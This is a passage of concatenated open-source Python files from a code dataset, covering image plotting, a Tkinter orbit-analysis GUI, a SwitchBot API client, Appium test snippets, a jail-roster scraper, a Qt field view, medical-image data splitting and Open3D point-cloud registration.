(Ellipsis).\n contrast_limits: Defaults to None and uses viewer contrast limits.\n If tuple passed, uses this for percentage contrast limits. If list passed, set contrast limits from list.\n\n Returns:\n colormapped_list: list of RGB images\n clims_used: list of contrast limits used\n \"\"\"\n blended = np.zeros(viewer.layers[0].data[index].shape + (4,))\n colormapped_list = list()\n clims_used = list()\n for i, layer in enumerate(viewer.layers):\n img = layer.data[index]\n if isinstance(img, da.core.Array):\n img = img.compute()\n\n # normalize data by clims\n if contrast_limits is None:\n lower_clim = layer.contrast_limits[0]\n upper_clim = layer.contrast_limits[1]\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n if isinstance(contrast_limits, tuple):\n if img.max() == 0:\n normalized_data = img\n else:\n lower_clim = np.percentile(img.ravel(), contrast_limits[0])\n upper_clim = np.percentile(img.ravel(), contrast_limits[1])\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n if isinstance(contrast_limits, list):\n lower_clim = contrast_limits[i][0]\n upper_clim = contrast_limits[i][1]\n normalized_data = (img - lower_clim) / (upper_clim - lower_clim)\n\n clims_used.append((lower_clim, upper_clim))\n colormapped_data = layer.colormap.map(normalized_data.flatten())\n colormapped_data = colormapped_data.reshape(normalized_data.shape + (4,))\n colormapped_list.append(colormapped_data)\n blended = blended + colormapped_data\n\n blended[..., 3] = 1\n\n colormapped_list.append(blended)\n return colormapped_list, clims_used\n\n\ndef create_matplotlib_figure_4i_over_days_of_stainings(\n viewer, image_titles, row_titles, index, defined_clims=None, **kwargs\n):\n title_list = [title + (\"composite\",) for title in image_titles]\n days_of_stainings = viewer.layers[0].data.shape[0]\n\n fig, ax = plt.subplots(\n nrows=days_of_stainings, ncols=len(viewer.layers) + 1, figsize=(8, 12)\n )\n clim_list = list()\n\n for day in range(days_of_stainings):\n if defined_clims is None:\n img_list, clims = blended_img(viewer, (day,) + index, **kwargs)\n else:\n img_list, clims = blended_img(\n viewer, (day,) + index, contrast_limits=defined_clims[day], **kwargs\n )\n clim_list.append(clims)\n\n for i, img in enumerate(img_list):\n ax[day, i].imshow(img)\n ax[day, i].xaxis.set_visible(False)\n plt.setp(ax[day, i].spines.values(), visible=False)\n ax[day, i].tick_params(left=False, labelleft=False)\n if i == 0:\n ax[day, i].set_ylabel(f\"{row_titles[day]}\")\n ax[day, i].yaxis.label.set_color(\"white\")\n ax[day, i].set_title(title_list[day][i])\n\n return fig, ax, clim_list\n\n\ndef plot_img_lists(img_list, title_list, channel_list, figsize=(8, 12)):\n fig, ax = plt.subplots(nrows=len(img_list), ncols=len(img_list[0]), figsize=figsize)\n\n for i, (img_channels, title) in enumerate(zip(img_list, title_list)):\n for ii, (img, channel) in enumerate(zip(img_channels, channel_list)):\n ax[i, ii].imshow(img)\n ax[i, ii].xaxis.set_visible(False)\n plt.setp(ax[i, ii].spines.values(), visible=False)\n ax[i, ii].tick_params(left=False, labelleft=False)\n if i == 0:\n ax[i, ii].set_title(channel)\n if ii == 0:\n ax[i, ii].set_ylabel(title)\n ax[i, ii].yaxis.label.set_color(\"black\")\n\n plt.subplots_adjust(hspace=0.2, wspace=0.01)\n\n return fig, ax\n","repo_name":"morriso1/scanR_analysis","sub_path":"mpl_figs/mpl_figs.py","file_name":"mpl_figs.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3082751680","text":"\"\"\"\nFile : main.py\nAuthor : Victor Hertel\nDate : 20.07.2018\n\nGraphical User Interface of the Application\n\"\"\"\n\n\n\n# imports\nfrom GUI import SystemPage, OrbitPage, OrbitFamilyPage\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom tkinter import *\nfrom tkinter import filedialog, ttk\nfrom Utility import Utility, System, Plot, NumericalMethods\nfrom Orbit import Orbit, InitialGuess\nfrom OrbitFamily import OrbitFamily\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib as mpl\nfrom PIL import ImageTk, Image\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport os\n\n# global variables\nLARGE_FONT = (\"Verdana\", 12)\n\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# This method contains the start page.\n# ----------------------------------------------------------------------------------------------------------------------\nclass StartPage(Frame):\n # ------------------------------------------------------------------------------------------------------------------\n # The GUI structure is loaded during initialization.\n # ------------------------------------------------------------------------------------------------------------------\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n # main frame\n frameStartPage = Frame(self)\n frameStartPage.pack(expand=True, fill=BOTH, padx=10, pady=10)\n # button for creating new instance of orbit or orbit family\n instanceButton = Button(frameStartPage, text=\"Create New Instance\", command=lambda: StartPage.createNewInstance(self, parent, controller))\n instanceButton.grid(row=0, column=0, sticky='W', padx=5, pady=2)\n # button for creating new instance by loading data\n loadButton = Button(frameStartPage, text=\"Load From Data\", command=lambda: StartPage.loadFromData(self, parent, controller))\n loadButton.grid(row=0, column=1, sticky='E', padx=5, pady=2)\n # button to quit program\n quitButton = Button(frameStartPage, text=\"Exit\", command=self.client_exit)\n quitButton.grid(row=1, column=0, sticky='W', padx=5, pady=2)\n # ------------------------------------------------------------------------------------------------------------------\n # This method is called when the user wants to instantiate a new object.\n # ------------------------------------------------------------------------------------------------------------------\n def createNewInstance(self, parent, controller):\n controller.frames[\"SystemPage\"] = SystemPage.SystemPage(parent=parent, controller=controller)\n controller.frames[\"SystemPage\"].grid(row=0, column=0, sticky=\"nsew\")\n controller.show_frame(\"SystemPage\")\n # ------------------------------------------------------------------------------------------------------------------\n # This method is called when the user wants to load input data from a file.\n # ------------------------------------------------------------------------------------------------------------------\n def loadFromData(self, parent, controller):\n defaultPath = os.path.dirname(os.path.abspath(__file__)) + \"/Output/\"\n filePath = filedialog.askopenfilename(initialdir=defaultPath, title=\"Select file\", filetypes=((\"txt files\", \"*.txt\"), (\"all files\", \"*.*\")))\n file = open(filePath, \"r\")\n words = []\n type = None\n nameFP = None\n massFP = None\n nameSP = None\n massSP = None\n distance = None\n for lines in file:\n line = lines.split()\n if \"TYPE\" in lines:\n type = line[2]\n if \"NAME FIRST PRIMARY\" in lines:\n nameFP = line[4]\n if \"MASS FIRST PRIMARY\" in lines:\n massFP = float(line[4])\n if \"NAME SECOND PRIMARY\" in lines:\n nameSP = line[4]\n if \"MASS SECOND PRIMARY\" in lines:\n massSP = float(line[4])\n if \"PRIMARY DISTANCE\" in lines:\n distance = float(line[3])\n if \"LAGRANGIAN\" in lines:\n lagrangian = line[2]\n if \"ORBIT NUMBER\" in lines:\n orbitNumber = int(line[3])\n if \"ORBIT DISTANCE\" in lines:\n orbitDistance = float(line[3])\n # if \"DATA_START\" in lines:\n # for i in range(2):\n # line = file.readline()\n # words = line.split()\n\n if \"DATA_START\" in lines:\n for i in range(2):\n line = file.readline()\n words = line.split()\n x0 = np.array([float(words[2]), 0, float(words[3]), 0, float(words[4]), 0])\n for i in range(3):\n words.insert(2 * i + 3, 0)\n data = words\n while \"DATA_STOP\" not in line:\n words = line.split()\n for i in range(3):\n words.insert(2 * i + 3, 0)\n data = np.vstack([data, words])\n line = file.readline()\n data = data.astype(np.float)\n file.close()\n dynamicalSystem = System(nameFP, massFP, nameSP, massSP, distance)\n\n if type == \"ORBIT\":\n orbit = Orbit(x0, \"x\", dynamicalSystem)\n controller.frames[\"OrbitPage\"] = OrbitPage.OrbitPage(parent=parent, controller=controller, orbit=orbit, dynamicalSystem=dynamicalSystem)\n controller.frames[\"OrbitPage\"].grid(row=0, column=0, sticky=\"nsew\")\n controller.show_frame(\"OrbitPage\")\n elif type == \"FAMILY\":\n if data[0,4] > data[-1,4]:\n direction = \"Northern\"\n else:\n direction = \"Southern\"\n orbitFamily = OrbitFamily(x0, direction, lagrangian, orbitDistance, dynamicalSystem, familyData=data)\n controller.frames[\"OrbitFamilyPage\"] = OrbitFamilyPage.OrbitFamilyPage(parent=parent, controller=controller, orbitFamily=orbitFamily, dynamicalSystem=dynamicalSystem)\n controller.frames[\"OrbitFamilyPage\"].grid(row=0, column=0, sticky=\"nsew\")\n controller.show_frame(\"OrbitFamilyPage\")\n # ------------------------------------------------------------------------------------------------------------------\n # This method terminates the program.\n # ------------------------------------------------------------------------------------------------------------------\n def client_exit(self):\n exit()\n","repo_name":"vhertel/halo-orbit-analysis-tool","sub_path":"GUI/StartPage.py","file_name":"StartPage.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7974320248","text":"import base64\nimport hashlib\nimport hmac\nimport json\nimport sys\nimport time\nimport uuid\n\nimport requests\n\n\nclass Switchbot:\n \"\"\"Switchbot Utility class\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n pass\n\n def read_token(self) -> tuple:\n \"\"\"Import access token and secret from settings.json\"\"\"\n try:\n with open(\"settings.json\", \"r\") as f:\n settings = json.load(f)\n token = settings[\"token\"]\n secret = settings[\"secret\"]\n return token, secret\n except FileNotFoundError:\n sys.exit(\"settings.json file does not exist\")\n except KeyError:\n sys.exit(\"settings.json file is invarid\")\n\n def gen_sign(self) -> dict:\n \"\"\"Generate Switchbot API v1.1 sign header\n\n Returns:\n Switchbot API v1.1 sign header\n \"\"\"\n\n token, secret = self.read_token()\n\n nonce = str(uuid.uuid4())\n t = int(round(time.time() * 1000))\n string_to_sign = \"{}{}{}\".format(token, t, nonce)\n\n string_to_sign = bytes(string_to_sign, \"utf-8\")\n secret = bytes(secret, \"utf-8\")\n\n hmacstr = hmac.new(\n secret, msg=string_to_sign, digestmod=hashlib.sha256\n ).digest()\n sign = base64.b64encode(hmacstr)\n\n header = {}\n header[\"Authorization\"] = token\n header[\"sign\"] = str(sign, \"utf-8\")\n header[\"t\"] = str(t)\n header[\"nonce\"] = nonce\n\n return header\n\n def devicelist(self) -> None:\n \"\"\"Create all Switchbot device list as deviceList.txt\"\"\"\n header = self.gen_sign()\n response = requests.get(\n \"https://api.switch-bot.com/v1.1/devices\", headers=header\n )\n devices = json.loads(response.text)\n\n with open(\"deviceList.txt\", \"w\", encoding=\"utf-8\", newline=\"\\n\") as f:\n try:\n for device in devices[\"body\"][\"deviceList\"]:\n f.write(device[\"deviceId\"] + \", \")\n f.write(device[\"deviceName\"] + \", \")\n f.write(device[\"deviceType\"] + \", \")\n f.write(device[\"hubDeviceId\"] + \"\\n\")\n\n for device in devices[\"body\"][\"infraredRemoteList\"]:\n f.write(device[\"deviceId\"] + \", \")\n f.write(device[\"deviceName\"] + \", \")\n f.write(device[\"remoteType\"] + \", \")\n f.write(device[\"hubDeviceId\"] + \"\\n\")\n except KeyError:\n sys.exit(\"Something wrong\")\n\n def get_scene_list(self) -> None:\n \"\"\"Get scene List as sceneList.txt\"\"\"\n header = self.gen_sign()\n response = requests.get(\n \"https://api.switch-bot.com/v1.1/scenes\", headers=header\n )\n scenes = json.loads(response.text)\n\n if scenes[\"message\"] != \"success\":\n sys.exit(scenes[\"message\"])\n else:\n with open(\n \"sceneList.txt\", \"w\", encoding=\"utf-8\", newline=\"\\n\"\n ) as f:\n for scene in scenes[\"body\"]:\n f.write(scene[\"sceneId\"] + \", \")\n f.write(scene[\"sceneName\"] + \"\\n\")\n\n def scene_execute(self, sceneId: str) -> str:\n \"\"\"Execute scene\"\"\"\n header = self.gen_sign()\n url = \"https://api.switch-bot.com/v1.1/scenes/\" + sceneId + \"/execute\"\n response = requests.post(url=url, headers=header)\n return response.text\n","repo_name":"iCarrot0605/Switchbot_utility","sub_path":"src/switchbot_utility/switchbot.py","file_name":"switchbot.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660348339","text":"import time\n\nfrom appium import webdriver\n\n_appPackage = 'com.xueqiu.android'\n_appActivity = '.view.WelcomeActivityAlias'\n\ncaps = {}\n# caps['uuid']='127.0.0.1:62001'#设备ios\ncaps['platformName'] = 'Android'\ncaps['platformVersion'] = '7.1.2'\ncaps['deviceName'] = '127.0.0.1:62001'\ncaps['appPackage'] = _appPackage\ncaps['appActivity'] = _appActivity\ncaps['noReset'] = True\ndriver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\ndriver.implicitly_wait(30)\n#关闭app,一般与launch_app 一起使用\ndriver.close_app()\n#判断APP是否安装\nprint(driver.is_app_installed(_appPackage))#判断是否安装\n#print(driver.is_app_installed(_appPackage))判断是否安装\n#安装app,存在卸载后再安装\ndriver.install_app(\"C:\\\\Users\\\\刘朋强\\\\Desktop\\\\xueqiu.apk\")\n#driver.install_app(\"C:\\\\Users\\\\刘朋强\\\\Desktop\\\\xueqiu.apk\")跟路径\ntime.sleep(3)\n#打开页面\ndriver.start_activity(_appPackage,_appActivity)\ntime.sleep(2)\n#置后台\ndriver.background_app(5)\ntime.sleep(2)\n#重置\ndriver.reset()\n#隐藏键盘\ndriver.press_keycode()\n#手势类的操作,拖动,滑动,长按\nfrom appium.webdriver.common.touch_action import TouchAction\n#TouchAction(driver),鼠标操作的实例化\n#按压控件,element\\坐标点[x,y],不能同时写,release()结束,释放按压指针perfrom()执行\n#TouchAction(driver).press(element\\坐标点[x,y]).release().perfrom()\n#长按,先执行后释放\n#TouchAction(driver).long_press(element=).perform().release()\n#点击,注意:语法([(x.y)])1,内置tap函数2使用TouchAction类\ndriver.tap([(100,200)])\n#TouchAction(driver).tap(element=).perform().release()\n#暂停,单位是毫秒\nTouchAction(driver).wait(2000)\n#移动,element目标位置元素\n#TouchAction(driver).move_to(element=)\n#长按移动到\nTouchAction(driver).long_press().move_to().perform().release()\n#滑动\n#driver.swipe(x1,y1,x2,y2,times)\n#收起键盘\ndriver.hide_keyboard()\n#摇一摇\ndriver.shake()\n#滚动,从a到b\n#driver.scroll(a_element,b_element)元素\n#driver.flick(x1,y1,x2,y2)#坐标点\n#放大,缩小\nfrom appium.webdriver.common.multi_action import MultiAction\n#获取屏幕分辨率\nx=driver.get_window_size()[\"widch\"]\ny=driver.get_window_size()[\"hight\"]\ndriver.swipe(0.8*x,0.5*y,0.1*x,0.2*y,2000)\n#网络\ndriver.set_network_connection(4)\n#通知栏\ndriver.open_notifications()\n#修改经纬度\ndriver.set_location(latitude=12,longitude=20,altitude=None)\n#is_enabled编辑,is_selected选中,is_displayed是否可见\ndriver.find_element().is_displayed()\nassert driver.find_element().is_enabled()==False\n#元素定位\nfrom appium.webdriver.common.mobileby import MobileBy\n#切换页面\ndriver.switch_to.context(\"页面\")","repo_name":"Jinghua123456/yueying","sub_path":"pythonProject/xueqiuAutoTeat/case/Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35556404784","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta\nimport requests\nimport requests_cache\nfrom time import sleep\nfrom models import detainee_info, charge\nfrom peewee import DoesNotExist\nfrom urllib.parse import parse_qs, urlparse\n\n\nrequests_cache.install_cache(\n\t'cache',\n\texpire_after=timedelta(hours=24),\n\tallowable_methods=('GET')\n)\n\nurl = 'https://report.boonecountymo.org/mrcjava/servlet/RMS01_MP.R00040s?run=2&R001=&R002=&ID=3641&hover_redir=&width=950'\n\nr = requests.get(url, headers={'user-agent': \"I'm good people!!!\"})\n\nsoup = BeautifulSoup(r.content, \"lxml\")\n\n\ndivs = soup.find_all('div', class_='mugshotDiv')\n\t\n\n\n#all IDs (keys)\n\ndef get_detainee_ids(div):\n\n\tdetainee_ID = div.attrs['id'].lstrip('mugshot')\n\n\treturn detainee_ID\n\n\n#for all names\ndef get_detainee_names(div):\n\tname = div.find('div', class_=\"inmateName\").text.strip()\n\treturn name\n\n\n#ecreate detainee info table\n\ndef create_info_table(div):\n\tdetainee_ID = div.get('id').lstrip('mugshot')\n\tdetainee_name = div.find('div', class_=\"inmateName\").text.strip()\n\n\tinfo_table = div.find('table', class_=\"collapse centered_table shadow\")\n\t\n\ttrs = info_table.find_all('tr')\n\t\n\t#data is a dictionary\n\tdata = {'height': \"N/A\", 'weight': \"N/A\", 'sex': \"N/A\",\n\t\t\t'eyes': \"N/A\", 'hair': \"N/A\", 'race': \"N/A\", \n\t\t\t'age': \"N/A\", 'city': \"N/A\", 'state': \"N/A\", }\n\n\tfor tr in trs:\n\t\ttds = tr.find_all('td')\n\t\tkey = tds[0].text.lower().strip()\n\t\tvalue = tds[1].text.strip()\n\t\tdata[key] = value\n\t\n\n\tdetainee_info.create(\n\t\tdetainee_id = detainee_ID,\n\t\tname = detainee_name,\n\t\theight = data['height'],\n\t\tweight = data['weight'],\n\t\tsex = data['sex'],\n\t\teyes = data['eyes'],\n\t\thair = data['hair'],\n\t\trace = data['race'],\n\t\tage = data['age'],\n\t\tcity = data['city'],\n\t\tstate = data['state'],\n\t)\n \n\n#case number \ndef get_case_nums(div):\n\n\tcase_nums = div.find_all('td', attrs={\"data-th\": \"Case #\"})\n\n\treturn case_nums\n\t\n\n#extract charge table\n\ndef create_charge_table(div,element):\n\n\tdetainee_ID = div.get('id').lstrip('mugshot')\n\n\ttr = element.find_parent('tr')\n\n\tdata = {}\n\n\tfor td in tr.find_all('td'):\n\t\tkey = td.attrs['data-th'].lower().strip()\n\t\tvalue = td.text.strip()\n\t\tdata[key] = value\n\n\tcharge.create(\n\t\tdetainee_id= detainee_ID,\n\t\tcase_num= data['case #'],\n\t\tdescription= data['charge description'],\n\t\tstatus= data['charge status'],\n\t\tbail_amount= data['bail amount'],\n\t\tbond_type= data['bond type'],\n\t\tcourt_date= data['court date'],\n\t\tcourt_time= data['court time'],\n\t\tjurisdiction= data ['court of jurisdiction']\n\t\t)\n\n\n\ndef main():\n\tprint('executing scraper')\n\tdivs = soup.find_all('div', class_='mugshotDiv')\n\n\tfor div in divs:\n\t\tdetainee_ID = get_detainee_ids(div)\n\t\tname = get_detainee_names(div)\n\t\tcase_nums = get_case_nums(div)\n\n\t\tprint('checking %s information' % name)\n\n\t\ttry:\n\t\t\tdetainee_info.get(detainee_id=detainee_ID)\n\t\texcept DoesNotExist:\n\t\t\tcreate_info_table(div)\n\t\t\tprint('adding %s info' % name)\n\t\t\tprint('done')\n\t\telse:\n\t\t\tprint('%s already exists' % name)\n\n\t\tprint(\"checking %s charge_information\" %name)\n\t\tfor element in case_nums:\n\t\t\tcase_num = element.text.lower().strip()\n\t\t\ttry:\n\t\t\t\tcreate_charge_table(div, element)\n\t\t\t\tprint('adding Case# %s' % case_num)\n\t\t\texcept DoesNotExist:\n\t\t\t\tprint('%s already exists' % case_num)\n\t\tprint(\"finished with detainee %s\" % name)\n\t\tsleep(1.5)\n\n\tprint('HAHA!!Finally Ready To Go!!')\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"hctbg/jail","sub_path":"detainee.py","file_name":"detainee.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69818977402","text":"from PyQt4 import QtGui\nimport qimage2ndarray #http://kogs-www.informatik.uni-hamburg.de/~meine/software/qimage2ndarray/doc/#converting-ndarrays-into-qimages\nfrom PyQt4 import QtCore\nimport numpy as np\nimport dnfpy.view.plotArrayQt\nimport pyqtgraph as pg\nfrom scipy import signal\nfrom scipy import ndimage\nimport scipy as sp\nimport cv2\n\nfrom dnfpy.view.arrayView import ArrayView\n\n\nfrom scipy.interpolate import interpolate\n\ndef permute(a,b):\n xx,yy = np.meshgrid(a,b)\n size2 = len(a) * len(b)\n xx = xx.reshape(size2)\n yy = yy.reshape(size2)\n return (np.dstack((xx,yy))).reshape(len(a),len(b),2)\n\ndef interpolateArray(data,shape,kind='linear'):\n X,Y = np.meshgrid(np.arange(data.shape[0]),np.arange(data.shape[1]))\n outgrid = interpolate.interp2d(X,Y,data,kind=kind)\n xi = np.linspace(0,data.shape[0],shape[0])\n yi = np.linspace(0,data.shape[1],shape[1])\n z = outgrid(xi,yi)\n return z\n\n\n\nclass FhpMapView(ArrayView):\n triggerOnClick = QtCore.pyqtSignal(str,int,int)#Will be triggered on click\n triggerOnRClick = QtCore.pyqtSignal(str,int,int)#Will be triggered on click\n triggerOnParamChanged = QtCore.pyqtSignal()\n #map name coord x y\n def __init__(self, map, runner,mapView):\n super(FhpMapView, self).__init__(map,runner,mapView)\n #self.stateList.append(\"speed\")\n self.size =self.map.getArg('size')\n self.nbPoints = 50\n\n x = np.linspace(0,1,self.nbPoints)\n y = np.linspace(0,1,self.nbPoints)\n self.points = permute(x,y)\n \n\n\n def updateArray(self):\n super(FhpMapView,self).updateArray()\n if self.viewState == \"speed\":\n self.speedViewUpdate()\n\n def paintEvent(self, event):\n super(FhpMapView,self).paintEvent(event)\n if self.viewState == \"speed\":\n self.paintSpeed(event)\n\n\n def speedViewUpdate(self):\n self.speed = self.map.celerity(self.map.getData())\n speedX = self.speed[:,:,1]\n speedY = self.speed[:,:,0]\n\n #echantillone\n# downX = speedX[::self.step,::self.step]\n# downY = speedY[::self.step,::self.step]\n downX = cv2.resize(speedX,(self.nbPoints,self.nbPoints))\n downY = cv2.resize(speedY,(self.nbPoints,self.nbPoints))\n\n self.vectors = np.dstack((downX,downY))\n self.vectors = self.vectors\n\n\n\n def paintSpeed(self,event):\n qp = QtGui.QPainter(self)\n qp.setPen(QtGui.QColor(0,0,125))\n\n\n size = self.rect().size()\n sizeWH = np.array([size.width(), size.height()])\n pts = self.points * sizeWH\n #print self.vectors\n vects = self.vectors/self.nbPoints*sizeWH\n vect2 = pts + vects\n qtLines = []\n for i in range(vects.shape[0]):\n for j in range(vects.shape[1]):\n p = pts[j,i,:]\n v = vect2[j,i,:]\n qpt = QtCore.QPointF(p[0],p[1])\n qv = QtCore.QPointF(v[0],v[1])\n qtLines.append(QtCore.QLineF(qpt,qv))\n #print \"v : \",v\n\n qp.drawLines(qtLines)\n\n\n\n\n def paintArray(self,event):\n qp = QtGui.QPainter(self)\n if self.img:\n qp.drawImage(event.rect(), self.img)\n qp.setPen(QtGui.QColor(0,0,0))\n qp.drawText(event.rect(), QtCore.Qt.AlignTop, \"%.2f\" %\n self.max)\n qp.drawText(event.rect(), QtCore.Qt.AlignBottom, \"%.2f\" %\n self.min)\n\n","repo_name":"bchappet/dnfpy","sub_path":"src/dnfpy/view/fhpMapView.py","file_name":"fhpMapView.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16948071629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 26 12:17:14 2020\r\n\r\n@author: michaely\r\n\"\"\"\r\n\r\n\r\nimport os\r\n#import pandas as pd\r\nimport random\r\n\r\ndata_case_path = r\"C:\\Users\\michaely\\Documents\\hiwi\\kits19\\data\"\r\ncases_ = os.listdir(data_case_path)\r\n\r\n\r\ncases = []\r\ncase_list = []\r\ncase_pred_list = []\r\nimage_list = []\r\nsegmentation_list = []\r\n\r\n# removing the cases without segmentation\r\nfor c in cases_:\r\n ca = c.split(\"_\")\r\n if len(ca) ==2:\r\n num = int(ca[1])\r\n if num <= 209:\r\n cases.append(c)\r\n\r\n# Randomize the list \r\ncases = random.sample(cases, len(cases))\r\n\r\n\r\n# Adding data to case list and removing the case 37\r\nfor case in cases:\r\n if case[0] == 'c' and 'case_00037' not in case:\r\n case = data_case_path + '\\\\' + case\r\n case_list.append(case)\r\n\r\n\r\n\r\n \r\n# Get pred_case \r\nfor case in cases:\r\n if case[0] == 'c' and 'case_00037' not in case:\r\n case = 'pred_' + case + '.nii'\r\n case_pred_list.append(case)\r\n\r\n \r\n# Getting the new image and new segmentation file paths\r\nfor cases_ in case_list:\r\n case_temp = os.listdir(cases_)\r\n\r\n for content in case_temp:\r\n\r\n if content =='new_image.nii':\r\n content_path = cases_ + '\\\\' + content\r\n content_path = content_path.replace('\\\\','/')\r\n image_list.append(content_path)\r\n \r\n elif content == 'new_segmentation.nii':\r\n content_path = cases_ + '\\\\' + content\r\n content_path = content_path.replace('\\\\','/')\r\n segmentation_list.append(content_path)\r\n \r\n\r\n\r\n\r\n# Splitting the datasets into train, val and test\r\ntrain = 174\r\nval = 20\r\ntest = 10\r\ntotal = train + val + test\r\n\r\ntrain_set = {'image' : image_list[0:train:1],\r\n 'segmentation': segmentation_list[0:train:1]} \r\n\r\n\r\nval_set = {'image' : image_list[train:train+val:1],\r\n 'segmentation': segmentation_list[train:train+val:1]} \r\n\r\n\r\ntest_set = {'image' : image_list[train+val:total:1],\r\n 'segmentation': segmentation_list[train+val:total:1]} \r\n\r\n\r\n# Prediction val and test list\r\nval_pred_set = case_pred_list[train:train+val:1]\r\ntest_pred_set = case_pred_list[train+val:total:1]\r\n\r\n\r\n\r\n\r\n# _06062020Edition\r\n\r\n\r\n\r\n\r\n\r\n\r\n# image_paths_df = pd.DataFrame(image_list).to_csv(index=False)\r\n# image_paths_df = image_paths_df.iloc[:,0]\r\n# segmentation_paths_df = pd.DataFrame(segmentation_list)","repo_name":"youpele52/thesis","sub_path":"listofniifilepaths.py","file_name":"listofniifilepaths.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45121808061","text":"# examples/Python/Advanced/multiway_registration.py\n\nimport open3d as o3d\nimport numpy as np\n\nvoxel_size = 0.02\nmax_correspondence_distance_coarse = voxel_size * 15\nmax_correspondence_distance_fine = voxel_size * 1.5\n\n\ndef load_point_clouds(voxel_size=0.0):\n pcds = []\n for i in range(3):\n pcd = o3d.io.read_point_cloud(\"../../TestData/ICP/cloud_bin_%d.pcd\" % i)\n pcd_down = o3d.geometry.voxel_down_sample(pcd, voxel_size=voxel_size)\n pcds.append(pcd_down)\n return pcds\n\n\ndef pairwise_registration(source, target):\n print(\"Apply point-to-plane ICP\")\n icp_coarse = o3d.registration.registration_icp(\n source, target, max_correspondence_distance_coarse, np.identity(4),\n o3d.registration.TransformationEstimationPointToPlane())\n icp_fine = o3d.registration.registration_icp(\n source, target, max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.registration.TransformationEstimationPointToPlane())\n transformation_icp = icp_fine.transformation\n information_icp = o3d.registration.get_information_matrix_from_point_clouds(\n source, target, max_correspondence_distance_fine,\n icp_fine.transformation)\n return transformation_icp, information_icp\n\n\ndef full_registration(pcds, max_correspondence_distance_coarse,\n max_correspondence_distance_fine):\n pose_graph = o3d.registration.PoseGraph()\n odometry = np.identity(4)\n pose_graph.nodes.append(o3d.registration.PoseGraphNode(odometry))\n n_pcds = len(pcds)\n for source_id in range(n_pcds):\n for target_id in range(source_id + 1, n_pcds):\n transformation_icp, information_icp = pairwise_registration(\n pcds[source_id], pcds[target_id])\n print(\"Build o3d.registration.PoseGraph\")\n if target_id == source_id + 1: # odometry case\n odometry = np.dot(transformation_icp, odometry)\n pose_graph.nodes.append(\n o3d.registration.PoseGraphNode(np.linalg.inv(odometry)))\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=False))\n else: # loop closure case\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=True))\n return pose_graph\n\n\nif __name__ == \"__main__\":\n\n o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Debug)\n pcds_down = load_point_clouds(voxel_size)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Full registration ...\")\n pose_graph = full_registration(pcds_down,\n max_correspondence_distance_coarse,\n max_correspondence_distance_fine)\n\n print(\"Optimizing PoseGraph ...\")\n option = o3d.registration.GlobalOptimizationOption(\n max_correspondence_distance=max_correspondence_distance_fine,\n edge_prune_threshold=0.25,\n reference_node=0)\n o3d.registration.global_optimization(\n pose_graph, o3d.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.registration.GlobalOptimizationConvergenceCriteria(), option)\n\n print(\"Transform points and display\")\n for point_id in range(len(pcds_down)):\n print(pose_graph.nodes[point_id].pose)\n pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Make a combined point cloud\")\n pcds = load_point_clouds(voxel_size)\n pcd_combined = o3d.geometry.PointCloud()\n for point_id in range(len(pcds)):\n pcds[point_id].transform(pose_graph.nodes[point_id].pose)\n pcd_combined += pcds[point_id]\n pcd_combined_down = o3d.geometry.voxel_down_sample(pcd_combined,\n voxel_size=voxel_size)\n o3d.io.write_point_cloud(\"multiway_registration.pcd\", pcd_combined_down)\n o3d.visualization.draw_geometries([pcd_combined_down])","repo_name":"nitthilan/volumetric_video","sub_path":"pre_processing/pose_refinement/open3d_sample.py","file_name":"open3d_sample.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"26592956254","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# GraphicTimerManager: handle dynamic and graphical behaviour of attached Timers \n# \n# \n# \nimport tkinter as tk\nfrom TimerData import TimerData\nfrom Util import *\nfrom DragAndDropLabelsManager import DragAndDropLabelsManager\nfrom AbstractGraphicTimerManager import AbstractGraphicTimerManager\nimport logging\n\n\nclass GraphicAttachedTimersManager(tk.Toplevel, AbstractGraphicTimerManager):\n # constructor\n def __init__(self, 